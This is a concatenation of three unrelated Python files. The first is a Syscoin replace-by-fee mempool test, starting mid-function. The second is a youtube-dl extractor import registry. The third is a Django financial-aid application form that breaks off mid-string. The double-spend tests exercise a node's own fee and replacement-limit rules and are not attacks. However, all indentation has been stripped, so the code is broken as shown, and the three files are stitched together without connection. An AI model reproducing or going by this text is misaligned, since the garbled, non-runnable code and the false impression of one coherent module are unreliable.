tx2.vout = [CTxOut(amount, scriptPubKey)]
tx2.rehash()
signed_tx = node.signrawtransactionwithwallet(txToHex(tx2))
txid = node.sendrawtransaction(signed_tx['hex'], 0)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
node.generate(1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert new_size < mempool_size
mempool_size = new_size
return COutPoint(int(txid, 16), 0)
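# Typical use in the tests below: carve out a confirmed outpoint and spend it
# with an opt-in (nSequence=0) transaction that can later be replaced, e.g.
#     outpoint = make_utxo(node, int(1.1 * COIN))
#     tx = CTransaction()
#     tx.vin = [CTxIn(outpoint, nSequence=0)]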
class ReplaceByFeeTest(SyscoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [
[
"-acceptnonstdtxn=1",
"-maxorphantx=1000",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101",
],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Leave IBD
self.nodes[0].generate(1)
make_utxo(self.nodes[0], 1*COIN)
# Ensure nodes are synced
self.sync_all()
self.log.info("Running test simple doublespend...")
self.test_simple_doublespend()
self.log.info("Running test doublespend chain...")
self.test_doublespend_chain()
self.log.info("Running test doublespend tree...")
self.test_doublespend_tree()
self.log.info("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
self.log.info("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
self.log.info("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
self.log.info("Running test too many replacements...")
self.test_too_many_replacements()
self.log.info("Running test opt-in...")
self.test_opt_in()
self.log.info("Running test RPC...")
self.test_rpc()
self.log.info("Running test prioritised transactions...")
self.test_prioritised_transactions()
self.log.info("Passed")
def test_simple_doublespend(self):
"""Simple doublespend"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# make_utxo may have generated a bunch of blocks, so we need to sync
# before we can spend the coins generated, or else the resulting
# transactions might not be accepted by our peers.
self.sync_all()
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
self.sync_all()
# Should fail because we haven't changed the fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT + b'a')]
tx1b_hex = txToHex(tx1b)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
# Extra 0.1 SYS fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = txToHex(tx1b)
# Works when enabled
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
mempool = self.nodes[0].getrawmempool()
assert tx1a_txid not in mempool
assert tx1b_txid in mempool
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 10*COIN:
remaining_value -= 1*COIN
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1, OP_DROP] * 15 + [1]))]
tx_hex = txToHex(tx)
txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 40 SYS - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 30 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert doublespent_txid not in mempool
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.0001*COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = txToHex(tx)
assert len(tx.serialize()) < 100000
txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.0001*COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee * n, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
# 1 SYS fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee * n - 1 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert tx.hash not in mempool
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT+1, MAX_REPLACEMENT_LIMIT*2):
fee = int(0.0001*COIN)
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2 * fee * n, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
# This will raise an exception
assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*999000]))]
tx1b_hex = txToHex(tx1b)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = make_utxo(self.nodes[0], int(1.2*COIN))
utxo2 = make_utxo(self.nodes[0], 3*COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
tx1a_txid = int(tx1a_txid, 16)
# Direct spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
# This will raise an exception
assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
# This will raise an exception
assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = make_utxo(self.nodes[0], int(1.1*COIN))
unconfirmed_utxo = make_utxo(self.nodes[0], int(0.1*COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1_hex = txToHex(tx1)
self.nodes[0].sendrawtransaction(tx1_hex, 0)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = txToHex(tx2)
# This will raise an exception
assert_raises_rpc_error(-26, "replacement-adds-unconfirmed", self.nodes[0].sendrawtransaction, tx2_hex, 0)
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10*COIN
utxo = make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001*COIN)
split_value = int((initial_nValue-fee)/(MAX_REPLACEMENT_LIMIT+1))
outputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = txToHex(splitting_tx)
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, 0)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT+1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value - fee, DUMMY_P2WPKH_SCRIPT)]
tx_i_hex = txToHex(tx_i)
self.nodes[0].sendrawtransaction(tx_i_hex, 0)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value-100*fee)*(MAX_REPLACEMENT_LIMIT+1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
# This will raise an exception
assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, double_tx_hex, 0)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
self.nodes[0].sendrawtransaction(double_tx_hex, 0)
def test_opt_in(self):
"""Replacing should only work if orig tx opted in"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# This transaction isn't shown as replaceable
assert_equal(self.nodes[0].getmempoolentry(tx1a_txid)['bip125-replaceable'], False)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = txToHex(tx1b)
# This will raise an exception
assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, 0)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx2b_hex = txToHex(tx2b)
# This will raise an exception
assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9*COIN), CScript([b'c'])), CTxOut(int(0.9*COIN), CScript([b'd']))]
tx3a_hex = txToHex(tx3a)
tx3a_txid = self.nodes[0].sendrawtransaction(tx3a_hex, 0)
# This transaction is shown as replaceable
assert_equal(self.nodes[0].getmempoolentry(tx3a_txid)['bip125-replaceable'], True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx3b_hex = txToHex(tx3b)
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx3c_hex = txToHex(tx3c)
self.nodes[0].sendrawtransaction(tx3b_hex, 0)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, 0)
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*740000]))]
tx1b_hex = txToHex(tx1b)
# Verify tx1b cannot replace tx1a.
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(txid=tx1a_txid, fee_delta=int(-0.1*COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
assert tx1b_txid in self.nodes[0].getrawmempool()
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx2a_hex = txToHex(tx2a)
self.nodes[0].sendrawtransaction(tx2a_hex, 0)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx2b.rehash()
tx2b_hex = txToHex(tx2b)
# Verify tx2b cannot replace tx2a.
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(txid=tx2b.hash, fee_delta=int(0.1*COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, 0)
assert tx2b_txid in self.nodes[0].getrawmempool()
def test_rpc(self):
us0 = self.nodes[0].listunspent()[0]
ins = [us0]
outs = {self.nodes[0].getnewaddress() : Decimal(1.0000000)}
rawtx0 = self.nodes[0].createrawtransaction(ins, outs, 0, True)
rawtx1 = self.nodes[0].createrawtransaction(ins, outs, 0, False)
json0 = self.nodes[0].decoderawtransaction(rawtx0)
json1 = self.nodes[0].decoderawtransaction(rawtx1)
assert_equal(json0["vin"][0]["sequence"], 4294967293)
assert_equal(json1["vin"][0]["sequence"], 4294967295)
rawtx2 = self.nodes[0].createrawtransaction([], outs)
frawtx2a = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": True})
frawtx2b = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": False})
json0 = self.nodes[0].decoderawtransaction(frawtx2a['hex'])
json1 = self.nodes[0].decoderawtransaction(frawtx2b['hex'])
assert_equal(json0["vin"][0]["sequence"], 4294967293)
assert_equal(json1["vin"][0]["sequence"], 4294967294)
if __name__ == '__main__':
ReplaceByFeeTest().main()
|
|
from .academicearth import AcademicEarthCourseIE
from .addanime import AddAnimeIE
from .aftonbladet import AftonbladetIE
from .anitube import AnitubeIE
from .aparat import AparatIE
from .appletrailers import AppleTrailersIE
from .archiveorg import ArchiveOrgIE
from .ard import ARDIE
from .arte import (
ArteTvIE,
ArteTVPlus7IE,
ArteTVCreativeIE,
ArteTVConcertIE,
ArteTVFutureIE,
ArteTVDDCIE,
)
from .auengine import AUEngineIE
from .bambuser import BambuserIE, BambuserChannelIE
from .bandcamp import BandcampIE, BandcampAlbumIE
from .bbccouk import BBCCoUkIE
from .blinkx import BlinkxIE
from .bliptv import BlipTVIE, BlipTVUserIE
from .bloomberg import BloombergIE
from .br import BRIE
from .breakcom import BreakIE
from .brightcove import BrightcoveIE
from .c56 import C56IE
from .canal13cl import Canal13clIE
from .canalplus import CanalplusIE
from .canalc2 import Canalc2IE
from .cbs import CBSIE
from .ceskatelevize import CeskaTelevizeIE
from .channel9 import Channel9IE
from .chilloutzone import ChilloutzoneIE
from .cinemassacre import CinemassacreIE
from .clipfish import ClipfishIE
from .cliphunter import CliphunterIE
from .clipsyndicate import ClipsyndicateIE
from .cmt import CMTIE
from .cnn import (
CNNIE,
CNNBlogsIE,
)
from .collegehumor import CollegeHumorIE
from .comedycentral import ComedyCentralIE, ComedyCentralShowsIE
from .condenast import CondeNastIE
from .criterion import CriterionIE
from .crunchyroll import CrunchyrollIE
from .cspan import CSpanIE
from .d8 import D8IE
from .dailymotion import (
DailymotionIE,
DailymotionPlaylistIE,
DailymotionUserIE,
)
from .daum import DaumIE
from .dotsub import DotsubIE
from .dreisat import DreiSatIE
from .defense import DefenseGouvFrIE
from .discovery import DiscoveryIE
from .dropbox import DropboxIE
from .ebaumsworld import EbaumsWorldIE
from .ehow import EHowIE
from .eighttracks import EightTracksIE
from .eitb import EitbIE
from .elpais import ElPaisIE
from .escapist import EscapistIE
from .everyonesmixtape import EveryonesMixtapeIE
from .exfm import ExfmIE
from .extremetube import ExtremeTubeIE
from .facebook import FacebookIE
from .faz import FazIE
from .firstpost import FirstpostIE
from .firsttv import FirstTVIE
from .fktv import (
FKTVIE,
FKTVPosteckeIE,
)
from .flickr import FlickrIE
from .fourtube import FourTubeIE
from .franceinter import FranceInterIE
from .francetv import (
PluzzIE,
FranceTvInfoIE,
FranceTVIE,
GenerationQuoiIE,
CultureboxIE,
)
from .freesound import FreesoundIE
from .freespeech import FreespeechIE
from .funnyordie import FunnyOrDieIE
from .gamekings import GamekingsIE
from .gamespot import GameSpotIE
from .gametrailers import GametrailersIE
from .gdcvault import GDCVaultIE
from .generic import GenericIE
from .googleplus import GooglePlusIE
from .googlesearch import GoogleSearchIE
from .hark import HarkIE
from .helsinki import HelsinkiIE
from .hotnewhiphop import HotNewHipHopIE
from .howcast import HowcastIE
from .huffpost import HuffPostIE
from .hypem import HypemIE
from .ign import IGNIE, OneUPIE
from .imdb import (
ImdbIE,
ImdbListIE
)
from .ina import InaIE
from .infoq import InfoQIE
from .instagram import InstagramIE
from .internetvideoarchive import InternetVideoArchiveIE
from .iprima import IPrimaIE
from .ivi import (
IviIE,
IviCompilationIE
)
from .jadorecettepub import JadoreCettePubIE
from .jeuxvideo import JeuxVideoIE
from .jukebox import JukeboxIE
from .justintv import JustinTVIE
from .jpopsukitv import JpopsukiIE
from .kankan import KankanIE
from .keezmovies import KeezMoviesIE
from .khanacademy import KhanAcademyIE
from .kickstarter import KickStarterIE
from .keek import KeekIE
from .kontrtube import KontrTubeIE
from .la7 import LA7IE
from .lifenews import LifeNewsIE
from .liveleak import LiveLeakIE
from .livestream import LivestreamIE, LivestreamOriginalIE
from .lynda import (
LyndaIE,
LyndaCourseIE
)
from .m6 import M6IE
from .macgamestore import MacGameStoreIE
from .mailru import MailRuIE
from .malemotion import MalemotionIE
from .mdr import MDRIE
from .metacafe import MetacafeIE
from .metacritic import MetacriticIE
from .mit import TechTVMITIE, MITIE, OCWMITIE
from .mixcloud import MixcloudIE
from .mpora import MporaIE
from .mofosex import MofosexIE
from .mooshare import MooshareIE
from .mtv import (
MTVIE,
MTVIggyIE,
)
from .muzu import MuzuTVIE
from .myspace import MySpaceIE
from .myspass import MySpassIE
from .myvideo import MyVideoIE
from .naver import NaverIE
from .nba import NBAIE
from .nbc import (
NBCIE,
NBCNewsIE,
)
from .ndr import NDRIE
from .ndtv import NDTVIE
from .newgrounds import NewgroundsIE
from .nfb import NFBIE
from .nhl import NHLIE, NHLVideocenterIE
from .niconico import NiconicoIE
from .ninegag import NineGagIE
from .normalboots import NormalbootsIE
from .novamov import NovaMovIE
from .nowness import NownessIE
from .nowvideo import NowVideoIE
from .ooyala import OoyalaIE
from .orf import ORFIE
from .pbs import PBSIE
from .photobucket import PhotobucketIE
from .playvid import PlayvidIE
from .podomatic import PodomaticIE
from .pornhd import PornHdIE
from .pornhub import PornHubIE
from .pornotube import PornotubeIE
from .prosiebensat1 import ProSiebenSat1IE
from .pyvideo import PyvideoIE
from .radiofrance import RadioFranceIE
from .rbmaradio import RBMARadioIE
from .redtube import RedTubeIE
from .ringtv import RingTVIE
from .ro220 import Ro220IE
from .rottentomatoes import RottenTomatoesIE
from .roxwel import RoxwelIE
from .rtlnow import RTLnowIE
from .rutube import (
RutubeIE,
RutubeChannelIE,
RutubeMovieIE,
RutubePersonIE,
)
from .rutv import RUTVIE
from .savefrom import SaveFromIE
from .servingsys import ServingSysIE
from .sina import SinaIE
from .slashdot import SlashdotIE
from .slideshare import SlideshareIE
from .smotri import (
SmotriIE,
SmotriCommunityIE,
SmotriUserIE,
SmotriBroadcastIE,
)
from .sohu import SohuIE
from .soundcloud import SoundcloudIE, SoundcloudSetIE, SoundcloudUserIE
from .southparkstudios import (
SouthParkStudiosIE,
SouthparkDeIE,
)
from .space import SpaceIE
from .spankwire import SpankwireIE
from .spiegel import SpiegelIE
from .spike import SpikeIE
from .stanfordoc import StanfordOpenClassroomIE
from .statigram import StatigramIE
from .steam import SteamIE
from .streamcloud import StreamcloudIE
from .streamcz import StreamCZIE
from .syfy import SyfyIE
from .sztvhu import SztvHuIE
from .teamcoco import TeamcocoIE
from .techtalks import TechTalksIE
from .ted import TEDIE
from .testurl import TestURLIE
from .tf1 import TF1IE
from .theplatform import ThePlatformIE
from .thisav import ThisAVIE
from .tinypic import TinyPicIE
from .toutv import TouTvIE
from .traileraddict import TrailerAddictIE
from .trilulilu import TriluliluIE
from .trutube import TruTubeIE
from .tube8 import Tube8IE
from .tudou import TudouIE
from .tumblr import TumblrIE
from .tutv import TutvIE
from .tvigle import TvigleIE
from .tvp import TvpIE
from .udemy import (
UdemyIE,
UdemyCourseIE
)
from .unistra import UnistraIE
from .ustream import UstreamIE, UstreamChannelIE
from .vbox7 import Vbox7IE
from .veehd import VeeHDIE
from .veoh import VeohIE
from .vesti import VestiIE
from .vevo import VevoIE
from .vice import ViceIE
from .viddler import ViddlerIE
from .videobam import VideoBamIE
from .videodetective import VideoDetectiveIE
from .videofyme import VideofyMeIE
from .videopremium import VideoPremiumIE
from .vimeo import (
VimeoIE,
VimeoChannelIE,
VimeoUserIE,
VimeoAlbumIE,
VimeoGroupsIE,
VimeoReviewIE,
)
from .vine import VineIE
from .viki import VikiIE
from .vk import VKIE
from .vube import VubeIE
from .wat import WatIE
from .wdr import WDRIE
from .weibo import WeiboIE
from .wimp import WimpIE
from .wistia import WistiaIE
from .worldstarhiphop import WorldStarHipHopIE
from .xhamster import XHamsterIE
from .xnxx import XNXXIE
from .xvideos import XVideosIE
from .xtube import XTubeIE
from .yahoo import (
YahooIE,
YahooNewsIE,
YahooSearchIE,
)
from .youjizz import YouJizzIE
from .youku import YoukuIE
from .youporn import YouPornIE
from .youtube import (
YoutubeIE,
YoutubeChannelIE,
YoutubeFavouritesIE,
YoutubeHistoryIE,
YoutubePlaylistIE,
YoutubeRecommendedIE,
YoutubeSearchDateIE,
YoutubeSearchIE,
YoutubeSearchURLIE,
YoutubeShowIE,
YoutubeSubscriptionsIE,
YoutubeTopListIE,
YoutubeTruncatedURLIE,
YoutubeUserIE,
YoutubeWatchLaterIE,
)
from .zdf import ZDFIE
_ALL_CLASSES = [
klass
for name, klass in globals().items()
if name.endswith('IE') and name != 'GenericIE'
]
_ALL_CLASSES.append(GenericIE)
def gen_extractors():
""" Return a list of an instance of every supported extractor.
The order does matter; the first extractor matched is the one handling the URL.
"""
return [klass() for klass in _ALL_CLASSES]
def get_info_extractor(ie_name):
"""Returns the info extractor class with the given ie_name"""
return globals()[ie_name+'IE']
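# Illustrative usage of the helpers above (both names are defined in this
# module, nothing hypothetical):
#     ie_class = get_info_extractor('Youtube')   # -> YoutubeIE
#     extractors = gen_extractors()               # GenericIE is instantiated
#                                                  # last, so it only handles
#                                                  # URLs nothing else matched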
|
|
from django import forms
from django.core.exceptions import ValidationError
from django.forms import Textarea, Select
from django.utils.translation import ugettext_lazy as _
from .models import (
    FinancialAidApplication, FinancialAidMessage, FinancialAidReviewData,
    FinancialAidEmailTemplate, Receipt, RECEIPT_TYPE_CHOICES,
)
def validate_is_checked(value):
if not value:
raise ValidationError(
_('Please read the page, then click this box')
)
class FinancialAidApplicationForm(forms.ModelForm):
i_have_read = forms.BooleanField(
label='I have read the <a href="/2019/financial-assistance/">Financial Assistance</a> page',
required=False, # so our own validator gets called
validators=[validate_is_checked],
)
class Meta:
model = FinancialAidApplication
fields = [
'i_have_read',
'first_time',
'amount_requested',
'international',
'travel_plans',
'profession',
'involvement',
'what_you_want',
'experience_level',
'presenting',
'presented',
'pyladies_grant_requested',
]
widgets = {
'travel_plans': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 1024}),
'what_you_do': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 500}),
'involvement': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 1024}),
'what_you_want': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 500}),
}
help_texts = {
'experience_level': (
'We welcome people of all experience levels.'
' What is your experience level with Python?'
),
'international': (
'Check the box if you will be traveling internationally,'
' or from anywhere outside of the continental United States.'
),
'involvement': (
'Describe your involvement in any open source projects'
' or Python communities, local or international.'
),
'profession': (
'What is your career? If you are a student,'
' what is the name of the school you are attending?'
),
'pyladies_grant_requested': (
"Would you like to be considered for a PyLadies grant?"
" (For women, including cis women,"
